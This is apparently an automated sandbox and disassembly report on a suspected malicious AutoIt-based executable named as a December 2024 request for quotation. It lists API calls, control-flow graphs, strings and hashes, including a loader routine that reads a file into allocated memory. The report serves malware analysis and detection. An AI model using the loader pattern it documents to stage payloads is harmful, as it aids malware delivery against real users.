                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                      • Opcode ID: 08fb0c49be15cec27751497bb6aa02b34d7e62a23ef1a241ea928725f3cbecec
                                                                                                                      • Instruction ID: 25f23b734209bc0a7902d8836f3ee58853f85ee65904dfd9cd438abc27c0ed42
                                                                                                                      • Opcode Fuzzy Hash: 08fb0c49be15cec27751497bb6aa02b34d7e62a23ef1a241ea928725f3cbecec
                                                                                                                      • Instruction Fuzzy Hash: 15313AB1844746DFEB108FE4EC85ADDBBF0FB0A715F14452AE580EA2A0E7B90585CF51
                                                                                                                      Function 00023041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00023074
                                                                                                                      • RegisterClassExW.USER32(00000030), ref: 0002309E
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000230AF
                                                                                                                      • InitCommonControlsEx.COMCTL32(?), ref: 000230CC
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000230DC
                                                                                                                      • LoadIconW.USER32(000000A9), ref: 000230F2
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00023101
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                      • Opcode ID: 21f560c4b78c1b9b4e8bf03b1d1fb1abee492685fc31d7faa8ffe8b0f3b99902
                                                                                                                      • Instruction ID: b23462577d109e71c1c95deaba9714efc183c130fb862fce0dbbcc4a440a4244
                                                                                                                      • Opcode Fuzzy Hash: 21f560c4b78c1b9b4e8bf03b1d1fb1abee492685fc31d7faa8ffe8b0f3b99902
                                                                                                                      • Instruction Fuzzy Hash: CE21E8B1900659AFEB00DFD4ED88BEDBBF4FB09705F00452AF610BA2A0D7B945448F91
                                                                                                                      Function 0002708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00024706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,000E52F8,?,000237AE,?), ref: 00024724
                                                                                                                        • Part of subcall function 0004050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00027165), ref: 0004052D
                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 000271A8
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0005E8C8
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0005E909
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 0005E947
                                                                                                                      • _wcscat.LIBCMT ref: 0005E9A0
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                      • API String ID: 2673923337-2727554177
                                                                                                                      • Opcode ID: abb3a5e83057e8a5e433c01ed2e05de8744c6dbef03e3a811acf47e044c05a23
                                                                                                                      • Instruction ID: c166e73eed0a5cb648113bd9a842795d6056b920570ef39826f4aed90b59b8ad
                                                                                                                      • Opcode Fuzzy Hash: abb3a5e83057e8a5e433c01ed2e05de8744c6dbef03e3a811acf47e044c05a23
                                                                                                                      • Instruction Fuzzy Hash: 4C71CF715083519ED304EF65FC819AFBBE8FF94750F40052EF644AB1A1DB369948CB92
                                                                                                                      Function 00023A46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00023A50
                                                                                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00023A5F
                                                                                                                      • LoadIconW.USER32(00000063), ref: 00023A76
                                                                                                                      • LoadIconW.USER32(000000A4), ref: 00023A88
                                                                                                                      • LoadIconW.USER32(000000A2), ref: 00023A9A
                                                                                                                      • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00023AC0
                                                                                                                      • RegisterClassExW.USER32(?), ref: 00023B16
                                                                                                                        • Part of subcall function 00023041: GetSysColorBrush.USER32(0000000F), ref: 00023074
                                                                                                                        • Part of subcall function 00023041: RegisterClassExW.USER32(00000030), ref: 0002309E
                                                                                                                        • Part of subcall function 00023041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000230AF
                                                                                                                        • Part of subcall function 00023041: InitCommonControlsEx.COMCTL32(?), ref: 000230CC
                                                                                                                        • Part of subcall function 00023041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 000230DC
                                                                                                                        • Part of subcall function 00023041: LoadIconW.USER32(000000A9), ref: 000230F2
                                                                                                                        • Part of subcall function 00023041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00023101
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                      • String ID: #$0$AutoIt v3
                                                                                                                      • API String ID: 423443420-4155596026
                                                                                                                      • Opcode ID: 341844d3cf0b4e6c43dc4c59bd81cb03d463f913335fe5a82a09f14a193efcbd
                                                                                                                      • Instruction ID: 572e922ea706b394371e7038bc6604dd43b78b09535438f91d2a0959006749a4
                                                                                                                      • Opcode Fuzzy Hash: 341844d3cf0b4e6c43dc4c59bd81cb03d463f913335fe5a82a09f14a193efcbd
                                                                                                                      • Instruction Fuzzy Hash: 10214D70D04755AFFB10DFA4EC89B9D7BB4FB09B16F00052AF600BA2A1D3B955408F94
                                                                                                                      Function 00023633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 767 23633-23681 769 23683-23686 767->769 770 236e1-236e3 767->770 771 236e7 769->771 772 23688-2368f 769->772 770->769 773 236e5 770->773 777 5d0cc-5d0fa call 31070 call 31093 771->777 778 236ed-236f0 771->778 774 23695-2369a 772->774 775 2374b-23753 PostQuitMessage 772->775 776 236ca-236d2 DefWindowProcW 773->776 780 5d154-5d168 call 82527 774->780 781 236a0-236a2 774->781 782 23711-23713 775->782 783 236d8-236de 776->783 812 5d0ff-5d106 777->812 784 236f2-236f3 778->784 785 23715-2373c SetTimer RegisterWindowMessageW 778->785 780->782 805 5d16e 780->805 787 23755-23764 call 244a0 781->787 788 236a8-236ad 781->788 782->783 791 5d06f-5d072 784->791 792 236f9-2370c KillTimer call 2443a call 23114 784->792 785->782 789 2373e-23749 CreatePopupMenu 785->789 787->782 794 236b3-236b8 788->794 795 5d139-5d140 788->795 789->782 798 5d074-5d076 791->798 799 5d0a8-5d0c7 MoveWindow 791->799 792->782 803 5d124-5d134 call 82d36 794->803 804 236be-236c4 794->804 795->776 801 5d146-5d14f call 77c36 795->801 807 5d097-5d0a3 SetFocus 798->807 808 5d078-5d07b 798->808 799->782 801->776 803->782 804->776 804->812 805->776 807->782 808->804 813 5d081-5d092 call 31070 808->813 812->776 816 5d10c-5d11f call 2443a call 2434a 812->816 813->782 816->776
                                                                                                                      APIs
                                                                                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 000236D2
                                                                                                                      • KillTimer.USER32(?,00000001), ref: 000236FC
                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 0002371F
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 0002372A
                                                                                                                      • CreatePopupMenu.USER32 ref: 0002373E
                                                                                                                      • PostQuitMessage.USER32(00000000), ref: 0002374D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                                                                      • String ID: TaskbarCreated
                                                                                                                      • API String ID: 129472671-2362178303
                                                                                                                      • Opcode ID: ae027da6f2299a75e28f20465d63f00f57bb2ac9df8416507c9328c890d26251
                                                                                                                      • Instruction ID: b23e29c513aca5cf71258e6ce3834503e6a94e27c3e06b6052121e3bca166bf0
                                                                                                                      • Opcode Fuzzy Hash: ae027da6f2299a75e28f20465d63f00f57bb2ac9df8416507c9328c890d26251
                                                                                                                      • Instruction Fuzzy Hash: BD41AFB1104955BBEF345F74FC4DBBE37D8E705301F10092AF646A62E2CA6D9E058321
                                                                                                                      Function 00023766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                                                                                      • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                                                                                      • API String ID: 1825951767-3513169116
                                                                                                                      • Opcode ID: 6228f57c5a2b8216ad3362c4445f7c15f872efc1cabb8e37270e3efd12d80ee3
                                                                                                                      • Instruction ID: 4b3403bc8d5ee9bce3bcf3401e05335ba0f062f1f90b5350f04ad7d172100393
                                                                                                                      • Opcode Fuzzy Hash: 6228f57c5a2b8216ad3362c4445f7c15f872efc1cabb8e37270e3efd12d80ee3
                                                                                                                      • Instruction Fuzzy Hash: C5A15E7190022DAADF15EBE0EC91EEEB778BF15300F44042AF515B7192DF785A08CB60
                                                                                                                      Function 0173B800 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 942 173b800-173b8ae call 17391f0 945 173b8b5-173b8db call 173c710 CreateFileW 942->945 948 173b8e2-173b8f2 945->948 949 173b8dd 945->949 954 173b8f4 948->954 955 173b8f9-173b913 VirtualAlloc 948->955 950 173ba2d-173ba31 949->950 952 173ba73-173ba76 950->952 953 173ba33-173ba37 950->953 956 173ba79-173ba80 952->956 957 173ba43-173ba47 953->957 958 173ba39-173ba3c 953->958 954->950 959 173b915 955->959 960 173b91a-173b931 ReadFile 955->960 961 173ba82-173ba8d 956->961 962 173bad5-173baea 956->962 963 173ba57-173ba5b 957->963 964 173ba49-173ba53 957->964 958->957 959->950 969 173b933 960->969 970 173b938-173b978 VirtualAlloc 960->970 971 173ba91-173ba9d 961->971 972 173ba8f 961->972 965 173bafa-173bb02 962->965 966 173baec-173baf7 VirtualFree 962->966 967 173ba6b 963->967 968 173ba5d-173ba67 963->968 964->963 966->965 967->952 968->967 969->950 973 173b97a 970->973 974 173b97f-173b99a call 173c960 970->974 975 173bab1-173babd 971->975 976 173ba9f-173baaf 971->976 972->962 973->950 982 173b9a5-173b9af 974->982 979 173baca-173bad0 975->979 980 173babf-173bac8 975->980 978 173bad3 976->978 978->956 979->978 980->978 983 173b9e2-173b9f6 call 173c770 982->983 984 173b9b1-173b9e0 call 173c960 982->984 990 173b9fa-173b9fe 983->990 991 173b9f8 983->991 984->982 992 173ba00-173ba04 CloseHandle 990->992 993 173ba0a-173ba0e 990->993 991->950 992->993 994 173ba10-173ba1b VirtualFree 993->994 995 173ba1e-173ba27 993->995 994->995 995->945 995->950
                                                                                                                      APIs
                                                                                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 0173B8D1
                                                                                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0173BAF7
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileFreeVirtual
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 204039940-0
                                                                                                                      • Opcode ID: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                      • Instruction ID: 7876239874da981f014084619c890b9c6882c02ae833a4622ccf572afc7e5314
                                                                                                                      • Opcode Fuzzy Hash: e3e00bf9dbafeb2e33b0b1731302cb2fbf5584eb46f22b1b855d3d8c7a9348fe
                                                                                                                      • Instruction Fuzzy Hash: 70A10970E00209EBDB14CFA4C894BEEFBB5FF88305F208199E605BB282D7759A41CB54
                                                                                                                      Function 000239D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1073 239d5-23a45 CreateWindowExW * 2 ShowWindow * 2
                                                                                                                      APIs
                                                                                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00023A03
                                                                                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00023A24
                                                                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00023A38
                                                                                                                      • ShowWindow.USER32(00000000,?,?), ref: 00023A41
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$CreateShow
                                                                                                                      • String ID: AutoIt v3$edit
                                                                                                                      • API String ID: 1584632944-3779509399
                                                                                                                      • Opcode ID: 7d85b2049cca14d67e8a5ebddebfba3be0f65c7fc092a4d9d5eedb2554331165
                                                                                                                      • Instruction ID: b71866a1c45f969b6adacccf8da5fcee09f60b821f7412d40013016f5e258ecb
                                                                                                                      • Opcode Fuzzy Hash: 7d85b2049cca14d67e8a5ebddebfba3be0f65c7fc092a4d9d5eedb2554331165
                                                                                                                      • Instruction Fuzzy Hash: 27F03A706006D07EFA305763AC88E7B3E7DD7CBF55B00052EBB00BA171C2690840CAB0
                                                                                                                      Function 0173B5A0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157fileCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1074 173b5a0-173b702 call 17391f0 call 173b490 CreateFileW 1081 173b704 1074->1081 1082 173b709-173b719 1074->1082 1083 173b7b9-173b7be 1081->1083 1085 173b720-173b73a VirtualAlloc 1082->1085 1086 173b71b 1082->1086 1087 173b73e-173b755 ReadFile 1085->1087 1088 173b73c 1085->1088 1086->1083 1089 173b757 1087->1089 1090 173b759-173b793 call 173b4d0 call 173a490 1087->1090 1088->1083 1089->1083 1095 173b795-173b7aa call 173b520 1090->1095 1096 173b7af-173b7b7 ExitProcess 1090->1096 1095->1096 1096->1083
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0173B490: Sleep.KERNELBASE(000001F4), ref: 0173B4A1
                                                                                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 0173B6F8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1691628844.0000000001739000.00000040.00000020.00020000.00000000.sdmp, Offset: 01739000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1739000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateFileSleep
                                                                                                                      • String ID: JCIIBUHN8VDSQ16BU9V0STN
                                                                                                                      • API String ID: 2694422964-3224443837
                                                                                                                      • Opcode ID: 16ab485596c610ae6efe1aa60165b3f6d6209d0db246746bd6f8d83d61a4be64
                                                                                                                      • Instruction ID: b2984068882799b32e6c242f8263fa158e862bca88d4e3192b26878cd6f38c37
                                                                                                                      • Opcode Fuzzy Hash: 16ab485596c610ae6efe1aa60165b3f6d6209d0db246746bd6f8d83d61a4be64
                                                                                                                      • Instruction Fuzzy Hash: A3618130D0424CDAEF11DBA4D858BEEBB75AF58304F144199E248BB2C1D7BA1B49CBA5
                                                                                                                      Function 0002407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1098 2407c-24092 1099 24098-240ad call 27a16 1098->1099 1100 2416f-24173 1098->1100 1103 240b3-240d3 call 27bcc 1099->1103 1104 5d3c8-5d3d7 LoadStringW 1099->1104 1107 5d3e2-5d3fa call 27b2e call 26fe3 1103->1107 1108 240d9-240dd 1103->1108 1104->1107 1117 240ed-2416a call 42de0 call 2454e call 42dbc Shell_NotifyIconW call 25904 1107->1117 1120 5d400-5d41e call 27cab call 26fe3 call 27cab 1107->1120 1110 240e3-240e8 call 27b2e 1108->1110 1111 24174-2417d call 28047 1108->1111 1110->1117 1111->1117 1117->1100 1120->1117
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0005D3D7
                                                                                                                        • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
                                                                                                                      • _memset.LIBCMT ref: 000240FC
                                                                                                                      • _wcscpy.LIBCMT ref: 00024150
                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00024160
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                                                                                      • String ID: Line:
                                                                                                                      • API String ID: 3942752672-1585850449
                                                                                                                      • Opcode ID: f3f263ba9f11fbca32bc8350ae2afbe66cabde05f6ebe65dad42f6a4eb8691c4
                                                                                                                      • Instruction ID: ebf2133292450458dee083dfacca6381b74cad1189bc849368278cec5d12b271
                                                                                                                      • Opcode Fuzzy Hash: f3f263ba9f11fbca32bc8350ae2afbe66cabde05f6ebe65dad42f6a4eb8691c4
                                                                                                                      • Instruction Fuzzy Hash: 5A31F371008754AFE771EB60EC86FDB77E8AF45305F10491EF689960A2DB74A648C783
                                                                                                                      Function 0004541D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 1133 4541d-45436 1134 45453 1133->1134 1135 45438-4543d 1133->1135 1137 45455-4545b 1134->1137 1135->1134 1136 4543f-45441 1135->1136 1138 45443-45448 call 48b28 1136->1138 1139 4545c-45461 1136->1139 1151 4544e call 48db6 1138->1151 1141 45463-4546d 1139->1141 1142 4546f-45473 1139->1142 1141->1142 1143 45493-454a2 1141->1143 1144 45475-45480 call 42de0 1142->1144 1145 45483-45485 1142->1145 1149 454a4-454a7 1143->1149 1150 454a9 1143->1150 1144->1145 1145->1138 1148 45487-45491 1145->1148 1148->1138 1148->1143 1153 454ae-454b3 1149->1153 1150->1153 1151->1134 1155 4559c-4559f 1153->1155 1156 454b9-454c0 1153->1156 1155->1137 1157 45501-45503 1156->1157 1158 454c2-454ca 1156->1158 1159 45505-45507 1157->1159 1160 4556d-4556e call 50ba7 1157->1160 1158->1157 1161 454cc 1158->1161 1162 45509-45511 1159->1162 1163 4552b-45536 1159->1163 1170 45573-45577 1160->1170 1165 454d2-454d4 1161->1165 1166 455ca 1161->1166 1168 45521-45525 1162->1168 1169 45513-4551f 1162->1169 1171 45538 1163->1171 1172 4553a-4553d 1163->1172 1173 454d6-454d8 1165->1173 1174 454db-454e0 1165->1174 1167 455ce-455d7 1166->1167 1167->1137 1177 45527-45529 1168->1177 1169->1177 1170->1167 1178 45579-4557e 1170->1178 1171->1172 1175 455a4-455a8 1172->1175 1179 4553f-4554b call 446e6 call 50e5b 1172->1179 1173->1174 1174->1175 1176 454e6-454ff call 50cc8 1174->1176 1182 455ba-455c5 call 48b28 1175->1182 1183 455aa-455b7 call 42de0 1175->1183 1191 45562-4556b 1176->1191 1177->1172 1178->1175 1181 45580-45591 1178->1181 1194 45550-45555 1179->1194 1187 45594-45596 1181->1187 1182->1151 1183->1182 1187->1155 1187->1156 1191->1187 1195 455dc-455e0 1194->1195 1196 4555b-4555e 1194->1196 1195->1167 1196->1166 1197 45560 1196->1197 1197->1191
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1559183368-0
                                                                                                                      • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                      • Instruction ID: fbfc39867ccac45375053d5429d7a8e2f45aa395cd055cf3571860bbcb2af5bc
                                                                                                                      • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                                                                                                      • Instruction Fuzzy Hash: 1651B6B0A00F05DBDB249FA9DC506BE77F2AF41326F248739F8259A2D2D7709D508B48
                                                                                                                      Function 0002686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00024DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,000E52F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00024E0F
                                                                                                                      • _free.LIBCMT ref: 0005E263
